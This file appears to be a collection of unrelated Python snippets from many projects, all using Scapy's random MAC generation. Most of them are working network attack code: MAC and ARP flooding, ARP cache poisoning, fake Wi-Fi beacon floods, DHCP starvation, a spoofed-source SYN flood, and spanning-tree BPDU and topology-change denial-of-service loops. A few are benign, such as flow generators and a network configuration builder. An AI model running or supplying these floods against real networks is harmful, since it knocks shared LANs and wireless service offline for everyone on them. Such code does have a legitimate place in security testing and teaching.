def generate_packets(): packet_list = [] #initializing packet_list to hold all the packets for i in xrange(1, 10000): packet = Ether(src=RandMAC(), dst=RandMAC()) / IP(src=RandIP(), dst=RandIP()) packet_list.append(packet) return packet_list
def create_beacon(name, password_protected=False): dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=str(RandMAC()), addr3=str(RandMAC())) beacon = Dot11Beacon( cap='ESS+privacy' if password_protected else 'ESS') essid = Dot11Elt(ID='SSID', info=name, len=len(name)) if not password_protected: return RadioTap() / dot11 / beacon / essid rsn = Dot11Elt(ID='RSNinfo', info=('\x01\x00' '\x00\x0f\xac\x02' '\x02\x00' '\x00\x0f\xac\x04' '\x00\x0f\xac\x02' '\x01\x00' '\x00\x0f\xac\x02' '\x00\x00')) return RadioTap() / dot11 / beacon / essid / rsn
def __init__(self, flowdecl=None): """constructor for the flow class. accepts a flowdecl (dictionary) with flow info""" if (type(flowdecl) != dict): parser_bailout("Flowdecl must be a dictionary.") try: self.name = flowdecl['name'] self.proto = flowdecl['proto'] self.src_host = flowdecl['src_host'] self.src_port = flowdecl['src_port'] self.flow = flowdecl['flow'] self.dst_host = flowdecl['dst_host'] self.dst_port = flowdecl['dst_port'] except KeyError: parser_bailout("Invalid flowdecl passed to Flow.init") self.src_mac = RandMAC() self.dst_mac = RandMAC() self.to_server_seq = random.randint(10000, 99999) self.to_client_seq = random.randint(10000, 99999) self.to_server_ack = 0 self.to_client_ack = 0 self.tcp_server_bytes = 0 self.tcp_client_bytes = 0 try: self.tcp_mss = int(flowdecl['attributes']['mss']) except KeyError: self.tcp_mss = 1460
def main(): if len(sys.argv) < 3: print("usage: %s <interface> <words of name>" % sys.argv[0]) sys.exit(1) iface = sys.argv[1] name = ' '.join(sys.argv[2:]) frames = [] for suffix in ap_slander: ssid = name + ' ' + suffix.upper() print(ssid) dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=str(RandMAC()), addr3=str(RandMAC())) beacon = Dot11Beacon(cap='ESS+privacy') essid = Dot11Elt(ID='SSID', info=ssid, len=len(ssid)) rsn = Dot11Elt( ID='RSNinfo', info=( '\x01\x00' #RSN Version 1 '\x00\x0f\xac\x02' #Group Cipher Suite : 00-0f-ac TKIP '\x02\x00' #2 Pairwise Cipher Suites (next two lines) '\x00\x0f\xac\x04' #AES Cipher '\x00\x0f\xac\x02' #TKIP Cipher '\x01\x00' #1 Authentication Key Managment Suite (line below) '\x00\x0f\xac\x02' #Pre-Shared Key '\x00\x00')) #RSN Capabilities (no extra capabilities) frame = RadioTap() / dot11 / beacon / essid / rsn #print("SSID=%-20s %r"%(ssid,frame)) frames.append(frame) sendp(frames, iface=iface, inter=0.0100 if len(frames) < 10 else 0, loop=1)
def main(): ssids = sys.argv[2:] #Network name here iface = sys.argv[1] #Interface name here frames = [] for netSSID in ssids: print netSSID dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=str(RandMAC()), addr3=str(RandMAC())) beacon = Dot11Beacon(cap='ESS+privacy') essid = Dot11Elt(ID='SSID', info=netSSID, len=len(netSSID)) rsn = Dot11Elt( ID='RSNinfo', info=( '\x01\x00' #RSN Version 1 '\x00\x0f\xac\x02' #Group Cipher Suite : 00-0f-ac TKIP '\x02\x00' #2 Pairwise Cipher Suites (next two lines) '\x00\x0f\xac\x04' #AES Cipher '\x00\x0f\xac\x02' #TKIP Cipher '\x01\x00' #1 Authentication Key Managment Suite (line below) '\x00\x0f\xac\x02' #Pre-Shared Key '\x00\x00')) #RSN Capabilities (no extra capabilities) frame = RadioTap() / dot11 / beacon / essid / rsn print "SSID=%-20s %r" % (netSSID, frame) frames.append(frame) sendp(frames, iface=iface, inter=0.0100 if len(frames) < 10 else 0, loop=1)
def MACFlood(): packet = ARP(op=2, psrc=RandIP(), hwsrc=RandMAC(), pdst=RandIP(), hwdst=RandMAC()) return packet
def generate_packets(): packet_list = [ ] #inicializa uma lista que armazenam todos os pacotes a serem criados. for i in xrange(1, 10000): packet = Ether(src=RandMAC(), dst=RandMAC()) / IP(src=RandIP(), dst=RandIP()) packet_list.append(packet) return packet_list
def generate_packets(self): # Initialize list to hold all the packets packet_list = [] # Create packets with random addresses for i in xrange(1, 30000): packet = Ether(src=RandMAC(), dst=RandMAC()) / IP(src=RandIP(), dst=RandIP()) packet_list.append(packet) return packet_list
def attack(target_mac,target_ip,gw_ip): print "[+]Counter Attack !!!" e = Ether(dst="FF:FF:FF:FF:FF:FF") while 1: a = ARP(psrc=RandIP(),pdst=RandIP(),hwsrc=RandMAC(),hwdst=RandMAC(),op=1) p = e/a/Padding("\x00"*18) sendp(p,verbose=0) a1 = ARP(psrc=gw_ip,pdst=target_ip,hwsrc=RandMAC(),hwdst=target_mac,op=2) p1 = e/a1/Padding("\x00"*18) sendp(p1,verbose=0)
def macFlood(self, interface, targetip): """ This method is for mac flooding Usage: wrb.macFlood(interface='wlan0', targetip='192.168.1.154') """ self.interface = interface self.targetip = targetip floodPacket = Ether( src=RandMAC("*:*:*:*:*:*"), dst=RandMAC("*:*:*:*:*:*")) / IP( src=RandIP("*.*.*.*"), dst=self.targetip) / ICMP() sendp(floodPacket, iface=self.interface, loop=1)
def __init__(self, flowdecl=None): """constructor for the flow class. accepts a flowdecl (dictionary) with flow info""" if (type(flowdecl) != dict): parser_bailout("Flowdecl must be a dictionary.") try: self.name = flowdecl['name'] self.l3_proto = flowdecl['l3_proto'] self.l4_proto = flowdecl['l4_proto'] self.src_host = flowdecl['src_host'] self.src_port = flowdecl['src_port'] self.flow = flowdecl['flow'] self.dst_host = flowdecl['dst_host'] self.dst_port = flowdecl['dst_port'] except KeyError: parser_bailout("Invalid flowdecl passed to Flow.init") self.src_mac = RandMAC() self.dst_mac = RandMAC() #set a user-supplied source and destination mac, if provided if 'src_mac' in flowdecl['attributes']: logging.debug("Using user-supplied source mac") smac = flowdecl['attributes']['src_mac'].lower() if self._valid_mac(smac): self.src_mac = smac else: parser_bailout( "A src_mac ({}) was explicitly set, but it doesn't appear to be valid." .format(smac)) if 'dst_mac' in flowdecl['attributes']: logging.debug("Using user-supplied dest mac") dmac = flowdecl['attributes']['dst_mac'].lower() if self._valid_mac(dmac): self.dst_mac = dmac else: parser_bailout( "A dst_mac ({}) was explicitly set, but it doesn't appear to be valid." .format(dmac)) self.to_server_seq = random.randint(10000, 99999) self.to_client_seq = random.randint(10000, 99999) self.to_server_ack = 0 self.to_client_ack = 0 self.tcp_server_bytes = 0 self.tcp_client_bytes = 0 try: self.tcp_mss = int(flowdecl['attributes']['mss']) except KeyError: self.tcp_mss = 1460
def generate_packets() -> list: """Simple packet_list to hold all packets Args: None Return: list: packet list. """ packet_list = [] for i in range(1, 10000): packet = Ether(src=RandMAC(), dst=RandMAC()) / IP(src=RandIP(), dst=RandIP()) packet_list.append(packet) return packet_list
def ssidSpawner(config): #enable monitor mode and set the channel. setMonitorMode(config["iface"]) setChannel(str(config["iface"]), config["channel"]) frames = [] while True: #for netSSID in ssids: netSSID = id_generator() print(netSSID) dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff',addr2=str(RandMAC()), addr3=str(RandMAC())) beacon = Dot11Beacon(cap='ESS+privacy') essid = Dot11Elt(ID='SSID',info=netSSID, len=len(netSSID)) rsn = Dot11Elt(ID='RSNinfo', info=( '\x01' #RSN Version 1 '\x00\x0f\xac\x02' #Group Cipher Suite : 00-0f-ac TKIP '\x02\x00' #2 Pairwise Cipher Suites (next two lines) '\x00\x0f\xac\x04' #AES Cipher '\x00\x0f\xac\x02' #TKIP Cipher '\x01\x00' #1 Authentication Key Managment Suite (line below) '\x00\x0f\xac\x02' #Pre-Shared Key '\x00\x00')) #RSN Capabilities (no extra capabilities) frame = RadioTap()/dot11/beacon/essid/rsn print("SSID=%-20s %r"%(netSSID,frame)) frames.append(frame) sendp(frames, iface=iface, inter=0.0100 if len(frames)<10 else 0, loop=1)
def main(): ether = Ether(src="ff:ff:ff:ff:ff:ff") arp = ARP(op="who-has", psrc=RandIP(), pdst=RandIP(), hwsrc=RandMAC(), hwdst=RandMAC()) pkt = ether / arp pkt_lst = [] for x in xrange(25): pkt_lst.append(pkt) sendp(pkt_lst)
def stormWithBeaconFrames(): global interfaceName global monitorInterface log("Starting with storming on interface [{}]".format(interfaceName)) netSSID = 'testSSID' #Network name here iface = 'wlan0mon' #Interface name here dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=str(RandMAC()), addr3=str(RandMAC())) beacon = Dot11Beacon(cap='ESS+privacy') essid = Dot11Elt(ID='SSID',info=netSSID, len=len(netSSID)) rsn = Dot11Elt(ID='RSNinfo', info=( '\x01\x00' #RSN Version 1 '\x00\x0f\xac\x02' #Group Cipher Suite : 00-0f-ac TKIP '\x02\x00' #2 Pairwise Cipher Suites (next two lines) '\x00\x0f\xac\x04' #AES Cipher '\x00\x0f\xac\x02' #TKIP Cipher '\x01\x00' #1 Authentication Key Managment Suite (line below) '\x00\x0f\xac\x02' #Pre-Shared Key '\x00\x00')) #RSN Capabilities (no extra capabilities) frame = RadioTap()/dot11/beacon/essid/rsn frame.show() print("\nHexdump of frame:") hexdump(frame) raw_input("\nPress enter to start\n") sendp(frame, iface=iface, inter=0.100, loop=1)
def cmd_dhcp_starvation(iface, timeout, verbose): conf.verb = False if iface: conf.iface = iface conf.checkIPaddr = False ether = Ether(dst="ff:ff:ff:ff:ff:ff") ip = IP(src="0.0.0.0", dst="255.255.255.255") udp = UDP(sport=68, dport=67) dhcp = DHCP(options=[("message-type", "discover"), "end"]) while True: bootp = BOOTP(chaddr=str(RandMAC())) dhcp_discover = ether / ip / udp / bootp / dhcp ans, unans = srp(dhcp_discover, timeout=5) # Press CTRL-C after several seconds for _, pkt in ans: if verbose: print(pkt.show()) else: print(pkt.summary())
def starvation(inter, rolls): for i in range(1, rolls): kill = "kill -9 $(pidof dhclient " + inter + ")" os.system(kill) mac = str(RandMAC()) chmac = "ip l s dev " + inter + " addr " + mac os.system(chmac) dhcp = "dhclient " + inter os.system(dhcp)
def flood_attack(): #Mascaras con las que generar las macs e ips aleatorias DEFAULT_DIP = '0.0.0.0/0' DEFAULT_DMAC = 'ff:ff:ff:ff:ff:ff' DEFAULT_SIP = '0.0.0.0/0' DEFAULT_SMAC = '*:*:*:*:*:*' while(True): srcMac = str(RandMAC(DEFAULT_SMAC)) srcIp = str(RandIP(DEFAULT_SIP)) dstMac = str(RandMAC(DEFAULT_DMAC)) dstIp = str(RandIP(DEFAULT_DIP)) #Construimos el paquete con los datos generados packet = Ether(src=srcMac, dst=dstMac) / \ ARP(hwsrc=srcMac, psrc=srcIp, pdst=srcIp) #Enviamos el paquete GARP a broadcast print('Enviando paquete {} - {}'.format(srcMac, srcIp)) sendp(packet) time.sleep(0.1)
def get_random_ip6_address(eui64=1, prefix=get_ip6_address(groups=4, padded=True)): '''Creates a random ip6 address for a given prefix''' mac = "%s" % (RandMAC()) (first, second, third, fourth, fifth, sixth) = mac.split(":") if (eui64): host = first + second + ":" + third + "ff:" + "fe" + fourth + ":" + fifth + sixth else: host = str(RandIP6())[len(RandIP6()) / 2:len(RandIP6())] return get_ip6_padded(prefix + ":" + host)
def bpdu_dos(iface): id_list = [] for i in range(9): id_list.append(i * 4096) randmac = RandMAC() ether = Ether(dst=mac_dst,src=randmac)/LLC() stp = STP(rootid=choice(id_list),rootmac=randmac,bridgeid=choice(id_list),bridgemac=randmac) pkt = ether/stp sendp(pkt,iface=iface,loop=1)
def main(): ether = Ether(src=RandMAC()) ip = IP(src="0.0.0.0", dst="255.255.255.255") udp = UDP(sport=68, dport=67) bootp = BOOTP(chaddr=RandString(12, "1234567890asdfgs")) dhcp = DHCP(options=[("message-type", 'discover'), "end"]) pkt = ether / ip / udp / bootp / dhcp for x in xrange(100000): sendp(pkt)
def startAttack(selectedManufacturerId=None, packet_count=20000): packet_list = [] destMAC = "FF:FF:FF:FF:FF:FF" print('Initiating packet sending') for i in range(0, packet_count): packet = Ether(src=getRandomMacAddress(selectedManufacturerId), dst=RandMAC()) sendp(Ether(src=getRandomMacAddress(selectedManufacturerId), dst=destMAC) / ARP(op=2, psrc="0.0.0.0", hwdst=destMAC), verbose=0) packet_list.append(packet) return packet_list
def cmd_dhcp_starvation(iface, timeout, sleeptime, verbose): """Send multiple DHCP requests from forged MAC addresses to fill the DHCP server leases. When all the available network addresses are assigned, the DHCP server don't send responses. So, some attacks, like DHCP spoofing, can be made. \b # habu.dhcp_starvation Ether / IP / UDP 192.168.0.1:bootps > 192.168.0.6:bootpc / BOOTP / DHCP Ether / IP / UDP 192.168.0.1:bootps > 192.168.0.7:bootpc / BOOTP / DHCP Ether / IP / UDP 192.168.0.1:bootps > 192.168.0.8:bootpc / BOOTP / DHCP """ conf.verb = False if iface: iface = search_iface(iface) if iface: conf.iface = iface['name'] else: logging.error( 'Interface {} not found. Use habu.interfaces to show valid network interfaces' .format(iface)) return False conf.checkIPaddr = False ether = Ether(dst="ff:ff:ff:ff:ff:ff") ip = IP(src="0.0.0.0", dst="255.255.255.255") udp = UDP(sport=68, dport=67) dhcp = DHCP(options=[("message-type", "discover"), "end"]) while True: bootp = BOOTP(chaddr=str(RandMAC())) dhcp_discover = ether / ip / udp / bootp / dhcp ans, unans = srp(dhcp_discover, timeout=1) # Press CTRL-C after several seconds for _, pkt in ans: if verbose: print(pkt.show()) else: print(pkt.sprintf(r"%IP.src% offers %BOOTP.yiaddr%")) sleep(sleeptime)
def cmd_synflood(ip, interface, count, port, forgemac, forgeip, verbose): conf.verb = False if interface: conf.iface = interface layer2 = Ether() layer3 = IP() layer3.dst = ip layer4 = TCP() layer4.dport = port pkt = layer2 / layer3 / layer4 counter = 0 print("Please, remember to block your RST responses", file=sys.stderr) while True: if forgeip: pkt[IP].src = "%s.%s" % (pkt[IP].src.rsplit( '.', maxsplit=1)[0], randint(1, 254)) if forgemac: pkt[Ether].src = RandMAC() pkt[TCP].sport = randint(10000, 65000) if verbose: print(pkt.summary()) else: print('.', end='') sys.stdout.flush() sendp(pkt) counter += 1 if count != 0 and counter == count: break return True
def send_probe_req(self, bssid, essid): """Send a probe request to the specified AP""" src = RandMAC() if self.mac is None else self.mac self.logger.info( '[!] Sending Broadcast Probe Request: SRC=[%s] -> BSSID: %s ESSID: %s' % (src, bssid, essid)) param = Dot11ProbeReq() essid = Dot11Elt(ID='SSID', info=essid) rates = Dot11Elt(ID='Rates', info="\x03\x12\x96\x18\x24\x30\x48\x60") dsset = Dot11Elt(ID='DSset', info='\x01') pkt = RadioTap() / Dot11( type=0, subtype=4, addr1='ff:ff:ff:ff:ff:ff', addr2=src, addr3='ff:ff:ff:ff:ff:ff') / param / essid / rates / dsset try: sendp(pkt, verbose=0) except: return # raise # print("Probing network '%s (%s)'\n" % (bssid, essid)) try: # Build a probe request packet with a SSID and a WPS information element dst = mac2str(bssid) src = mac2str("ff:ff:ff:ff:ff:ff") packet = Dot11(addr1=dst, addr2=src, addr3=dst) / Dot11ProbeReq() packet = packet / Dot11Elt( ID=0, len=len(essid), info=essid) / Dot11Elt( ID=221, len=9, info="%s\x10\x4a\x00\x01\x10" % self.wps_parser.WPS_ID) # Send it! send(packet, verbose=0) # self.probedNets[bssid] = None except Exception, e: print 'Failure sending probe request to', essid, ':', e
def send_probe_req(self, essid, bssid, src=None): if not self.args.active: return if src is None: src = RandMAC() print( '[!] Sending 802.11 Probe Request: SRC=[%s] -> BSSID=[%s]\t(%s)' % (src, bssid, essid)) param = Dot11ProbeReq() essid = Dot11Elt(ID='SSID', info=essid) rates = Dot11Elt(ID='Rates', info="\x03\x12\x96\x18\x24\x30\x48\x60") dsset = Dot11Elt(ID='DSset', info='\x01') pkt = RadioTap() \ / Dot11(type=0, subtype=4, addr1=bssid, addr2=src, addr3=bssid) / param / essid / rates / dsset try: sendp(pkt, verbose=0) except: raise
def run(inter): """ This function launch STP TCN ATTACK :param inter: interface to be launched the attack :type inter: str """ interface = str(inter[0]) if len(interface) > 0: try: while 1: # dst=Ethernet Multicast address used for spanning tree protocol srcMAC = str(RandMAC()) # Random MAC in each iteration p_ether = Dot3(dst="01:80:c2:00:00:00", src=srcMAC) p_llc = LLC() p_stp = STP(bpdutype=0x80) # TCN packet pkt = p_ether/p_llc/p_stp # STP packet structure sendp(pkt, iface=interface, verbose=0) except KeyboardInterrupt: pass
def run(inter): """ This function launch STP CONF ATTACK :param inter: interface to be launched the attack :type inter: str """ interface = str(inter[0]) if len(interface) > 0: try: while 1: # Root Identifier 8 bytes (MAC and root priority) srcMAC = str(RandMAC()) # Random MAC in each iteration root_prior = int(RandInt()) % 65536 # 2 bytes # Brigde Identifier (mac and brigde priority) brigde_prior = int(RandInt()) % 65536 # 2 bytes # dst=Ethernet Multicast address used for spanning tree protocol p_ether = Dot3(dst="01:80:c2:00:00:00", src=srcMAC) p_llc = LLC() p_stp = STP(bpdutype=0x00, bpduflags=0x01, portid=0x8002, rootmac=srcMAC, bridgemac=srcMAC, rootid=root_prior, bridgeid=brigde_prior) # Conf packet pkt = p_ether / p_llc / p_stp # STP packet structure sendp(pkt, iface=interface, verbose=0) except KeyboardInterrupt: pass
def run(interface): """ This function launch DHCP DISCOVER DOS attack :param inter: interface to be launched the attack :type inter: str """ if len(interface) > 0: inter = str(interface[0]) try: while 1: src_mac = str(RandMAC()) ethernet = Ether(dst='ff:ff:ff:ff:ff:ff', src=src_mac, type=0x800) ip = IP(src="0.0.0.0", dst="255.255.255.255") udp = UDP(sport=68, dport=67) bootps = BOOTP(chaddr=src_mac, ciaddr='0.0.0.0', flags=1) dhcps = DHCP(options=[("message-type", "discover"), "end"]) packet = ethernet / ip / udp / bootps / dhcps sendp(packet, iface=inter, verbose=0) except KeyboardInterrupt: pass
def main(argv): config = {"SDXes": dict()} current_sdx = 1 # local SDX default settings local_sdx_network = "172.0.0.0/16" ip_generator = IPAddressGenerator(local_sdx_network) asn_generator = ASNGenerator() num_participants = int(argv.num_participants) config_file = argv.out_path + "global.cfg" # local SDX config tmp_sdx = { "Address": "localhost", "VNHs": "172.1.1.1/8", "VMAC Computation": { "VMAC Size": 10000, "Superset ID Size": 50, "Max Superset Size": 9000, "Best Path Size": 950, "Superset Threshold": 100 }, "Loop Detector": { "Port": 2201, "Max Random Value": 10000 }, "Policy Handler": { "Address": "localhost", "Port": 2301 }, "Route Server": { "IP": "172.1.255.254", "MAC": "08:00:27:89:33:dd", "Connection Port": 2301, "Connection Key": "xrs", "Interface": "rs1-eth0", "Fabric Port": 4 }, "Participants": {} } for i in range(1, num_participants + 1): tmp_sdx["Participants"][str(i)] = { "Ports": [{ "Id": i, "MAC": str(RandMAC()), "IP": ip_generator.get_address() }], "ASN": asn_generator.get_asn() } if i == 1: tmp_sdx["Participants"][str(i)]["Peers"] = range( 2, num_participants + 1) else: tmp_sdx["Participants"][str(i)]["Peers"] = [1] config["SDXes"]["1"] = tmp_sdx # remote SDXes config["SDXes"]["2"] = { "Address": "localhost", "Loop Detector": { "Port": 9999 }, "Participants": { "1": { "ASN": 5000 }, "2": { "ASN": 5100 } } } config["SDXes"]["3"] = { "Address": "localhost", "Loop Detector": { "Port": 9999 }, "Participants": { "1": { "ASN": 6000 }, "2": { "ASN": 6100 } } } with open(config_file, 'w') as outfile: json.dump(config, outfile)